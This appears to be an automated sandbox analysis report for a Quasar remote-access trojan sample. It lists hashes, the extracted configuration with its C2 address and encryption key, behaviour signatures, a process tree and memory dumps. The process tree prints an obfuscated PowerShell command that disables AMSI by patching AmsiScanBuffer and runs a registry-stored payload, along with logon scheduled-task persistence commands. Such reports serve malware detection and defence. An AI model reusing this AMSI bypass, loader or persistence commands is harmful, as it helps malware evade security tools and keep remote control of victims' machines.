Analysis
-
max time kernel
11s -
max time network
11s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
-
submitted
24-04-2024 17:16
Errors
Reason
Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-24T17:17:03Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win11-20240412-en/instance_8-dirty.qcow2\"}"
General
-
Target
kadsfknads.exe
-
Size
409KB
-
MD5
f78f2794728287425cac9fb2df79d06f
-
SHA1
3aedd26e40f9b97b76d2ac6ead991af37dcc61eb
-
SHA256
653cbbfc7a0733f10923772348b001a25f8c6ddb76c5de60dc8652d8b267d985
-
SHA512
12c2897886ee4052daf27199bb61d98b11a100c42d47fcd00694feaf1aff181f76ad9cab381236548f765da6d43f821ddfaff06adc3e82a8b92407cdcaef0c1f
-
SSDEEP
6144:prBdcuIns7ixFO/MlAGq0l9RkRSl/HVvKIIUb8rfVou49SDZQC8lU:Cs7ixmMlAGHlH/H1KIIRCSDZQ9U
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
Office04
C2
147.185.221.19:33587
Mutex
$Sxr-Y5UVaD4ms682Xx0mKC
Attributes
-
encryption_key
cNsPUetVqJ8ENI534piu
-
install_name
DLLBOOSTRAPPER.exe
-
log_directory
Upd Error Logs
-
reconnect_delay
3000
-
startup_key
Windows 2H22 x64 2022
-
subdirectory
DllHoster
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 41 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 48 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fd350f10-3949-41dd-9423-4a56d73f42f2}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wlrmdr.exe-s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CDyjfqktKYUK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lBBPKajvCJWkxc,[Parameter(Position=1)][Type]$bdrAKtwktA)$UFKDXRBufBQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+'d'+[Char](68)+'el'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'yMo'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+'le'+[Char](103)+'a'+'t'+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic,'+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+','+''+'A'+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$UFKDXRBufBQ.DefineConstructor('RT'+[Char](83)+''+'p'+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+'me'+[Char](44)+''+'H'+''+'i'+'d'+'e'+''+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$lBBPKajvCJWkxc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+'e'+','+'M'+'a'+''+'n'+''+'a'+'ge'+[Char](100)+'');$UFKDXRBufBQ.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+'N'+'e'+''+'w'+'S'+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+'i'+''+'r'+'tu'+[Char](97)+'l',$bdrAKtwktA,$lBBPKajvCJWkxc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');Write-Output $UFKDXRBufBQ.CreateType();}$VRpDrxrpvCeDM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+'m'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+''+'t'+''+'.'+''+'W'+'i'+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+'v'+[Char](101)+''+'M'+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+'d'+'s');$urcOocbvhForbt=$VRpDrxrpvCeDM.GetMethod('G'+[Char](101)+'t'+[Char](80)+''+'r'+'o'+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'S'+'t'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$eZrLvujyhaQmDVGWRKu=CDyjfqktKYUK @([String])([IntPtr]);$vBsQcstVNCvuEWCTWhNwfJ=CDyjfqktKYUK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TzCzkJzGFQP=$VRpDrxrpvCeDM.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l3'+'2'+''+'.'+''+'d'+''+[Char](108)+'l')));$fDmkXauZQxRHpb=$urcOocbvhForbt.Invoke($Null,@([Object]$TzCzkJzGFQP,[Object](''+[Char](76)+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+'ar'+'y'+''+[Char](65)+'')));$zwCruUTxZwErzliFy=$urcOocbvhForbt.Invoke($Null,@([Object]$TzCzkJzGFQP,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$HrVwcQZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fDmkXauZQxRHpb,$eZrLvujyhaQmDVGWRKu).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+'l'+'l'+'');$sZnKJpNkIlUFtSrlo=$urcOocbvhForbt.Invoke($Null,@([Object]$HrVwcQZ,[Object]('A'+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$MQlHJVFTUQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zwCruUTxZwErzliFy,$vBsQcstVNCvuEWCTWhNwfJ).Invoke($sZnKJpNkIlUFtSrlo,[uint32]8,4,[ref]$MQlHJVFTUQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$sZnKJpNkIlUFtSrlo,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zwCruUTxZwErzliFy,$vBsQcstVNCvuEWCTWhNwfJ).Invoke($sZnKJpNkIlUFtSrlo,[uint32]8,0x20,[ref]$MQlHJVFTUQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'T'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\kadsfknads.exe"C:\Users\Admin\AppData\Local\Temp\kadsfknads.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows 2H22 x64 2022" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\kadsfknads.exe" /rl HIGHEST /f2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\DllHoster\DLLBOOSTRAPPER.exe"C:\Users\Admin\AppData\Roaming\DllHoster\DLLBOOSTRAPPER.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Windows 2H22 x64 2022" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\DllHoster\DLLBOOSTRAPPER.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77kadsfknads.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\kadsfknads.exe'" /sc onlogon /rl HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\PickerHost.exeC:\Windows\System32\PickerHost.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\DllHoster\DLLBOOSTRAPPER.exeFilesize
409KB
MD5f78f2794728287425cac9fb2df79d06f
SHA13aedd26e40f9b97b76d2ac6ead991af37dcc61eb
SHA256653cbbfc7a0733f10923772348b001a25f8c6ddb76c5de60dc8652d8b267d985
SHA51212c2897886ee4052daf27199bb61d98b11a100c42d47fcd00694feaf1aff181f76ad9cab381236548f765da6d43f821ddfaff06adc3e82a8b92407cdcaef0c1f
-
C:\Windows\Temp\__PSScriptPolicyTest_njjg0lwx.4nr.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/468-95-0x0000029E5A400000-0x0000029E5A42B000-memory.dmpFilesize
172KB
-
memory/648-66-0x000002670B950000-0x000002670B97B000-memory.dmpFilesize
172KB
-
memory/648-72-0x00007FF8E7BC6000-0x00007FF8E7BC7000-memory.dmpFilesize
4KB
-
memory/648-70-0x00007FF8E7BC4000-0x00007FF8E7BC5000-memory.dmpFilesize
4KB
-
memory/648-67-0x00007FF8A7BB0000-0x00007FF8A7BC0000-memory.dmpFilesize
64KB
-
memory/648-68-0x00007FF8E7BC3000-0x00007FF8E7BC4000-memory.dmpFilesize
4KB
-
memory/648-54-0x000002670B920000-0x000002670B945000-memory.dmpFilesize
148KB
-
memory/648-57-0x000002670B950000-0x000002670B97B000-memory.dmpFilesize
172KB
-
memory/648-58-0x000002670B950000-0x000002670B97B000-memory.dmpFilesize
172KB
-
memory/704-74-0x000001D1955B0000-0x000001D1955DB000-memory.dmpFilesize
172KB
-
memory/704-89-0x00007FF8A7BB0000-0x00007FF8A7BC0000-memory.dmpFilesize
64KB
-
memory/704-86-0x000001D1955B0000-0x000001D1955DB000-memory.dmpFilesize
172KB
-
memory/736-107-0x000002632D0D0000-0x000002632D0FB000-memory.dmpFilesize
172KB
-
memory/1016-109-0x000001C25C9D0000-0x000001C25C9FB000-memory.dmpFilesize
172KB
-
memory/1016-85-0x000001C25C9D0000-0x000001C25C9FB000-memory.dmpFilesize
172KB
-
memory/1884-6-0x0000000005420000-0x0000000005432000-memory.dmpFilesize
72KB
-
memory/1884-19-0x0000000074C00000-0x00000000753B1000-memory.dmpFilesize
7.7MB
-
memory/1884-7-0x0000000006000000-0x000000000603C000-memory.dmpFilesize
240KB
-
memory/1884-1-0x0000000074C00000-0x00000000753B1000-memory.dmpFilesize
7.7MB
-
memory/1884-5-0x0000000004ED0000-0x0000000004F36000-memory.dmpFilesize
408KB
-
memory/1884-4-0x0000000004D30000-0x0000000004D40000-memory.dmpFilesize
64KB
-
memory/1884-3-0x0000000004DE0000-0x0000000004E72000-memory.dmpFilesize
584KB
-
memory/1884-2-0x0000000005480000-0x0000000005A26000-memory.dmpFilesize
5.6MB
-
memory/1884-0-0x0000000000280000-0x00000000002EC000-memory.dmpFilesize
432KB
-
memory/2372-42-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2372-38-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2372-46-0x00007FF8E6B10000-0x00007FF8E6BCD000-memory.dmpFilesize
756KB
-
memory/2372-132-0x00007FF8E7B20000-0x00007FF8E7D29000-memory.dmpFilesize
2.0MB
-
memory/2372-48-0x00007FF8E7B20000-0x00007FF8E7D29000-memory.dmpFilesize
2.0MB
-
memory/2372-43-0x00007FF8E7B20000-0x00007FF8E7D29000-memory.dmpFilesize
2.0MB
-
memory/2372-50-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2372-40-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2372-36-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2372-37-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3512-105-0x000001B699990000-0x000001B6999A0000-memory.dmpFilesize
64KB
-
memory/3512-20-0x00007FF8C5B30000-0x00007FF8C65F2000-memory.dmpFilesize
10.8MB
-
memory/3512-35-0x00007FF8E6B10000-0x00007FF8E6BCD000-memory.dmpFilesize
756KB
-
memory/3512-34-0x00007FF8E7B20000-0x00007FF8E7D29000-memory.dmpFilesize
2.0MB
-
memory/3512-33-0x000001B6B2350000-0x000001B6B237A000-memory.dmpFilesize
168KB
-
memory/3512-189-0x00007FF8C5B30000-0x00007FF8C65F2000-memory.dmpFilesize
10.8MB
-
memory/3512-32-0x000001B699990000-0x000001B6999A0000-memory.dmpFilesize
64KB
-
memory/3512-31-0x000001B6B1FD0000-0x000001B6B1FF2000-memory.dmpFilesize
136KB
-
memory/3512-22-0x000001B699990000-0x000001B6999A0000-memory.dmpFilesize
64KB
-
memory/3512-21-0x000001B699990000-0x000001B6999A0000-memory.dmpFilesize
64KB
-
memory/3512-47-0x00007FF8E6B10000-0x00007FF8E6BCD000-memory.dmpFilesize
756KB
-
memory/3512-44-0x00007FF8E7B20000-0x00007FF8E7D29000-memory.dmpFilesize
2.0MB
-
memory/3512-123-0x00007FF8E7B20000-0x00007FF8E7D29000-memory.dmpFilesize
2.0MB
-
memory/3512-120-0x000001B699990000-0x000001B6999A0000-memory.dmpFilesize
64KB
-
memory/3848-241-0x00007FF8E7B20000-0x00007FF8E7D29000-memory.dmpFilesize
2.0MB
-
memory/3848-306-0x00007FF8E7B20000-0x00007FF8E7D29000-memory.dmpFilesize
2.0MB
-
memory/4760-12-0x0000000074C00000-0x00000000753B1000-memory.dmpFilesize
7.7MB
-
memory/4760-13-0x0000000005380000-0x0000000005390000-memory.dmpFilesize
64KB
-
memory/4760-51-0x0000000006A60000-0x0000000006A6A000-memory.dmpFilesize
40KB
-
memory/4760-94-0x0000000005380000-0x0000000005390000-memory.dmpFilesize
64KB
-
memory/4760-75-0x0000000074C00000-0x00000000753B1000-memory.dmpFilesize
7.7MB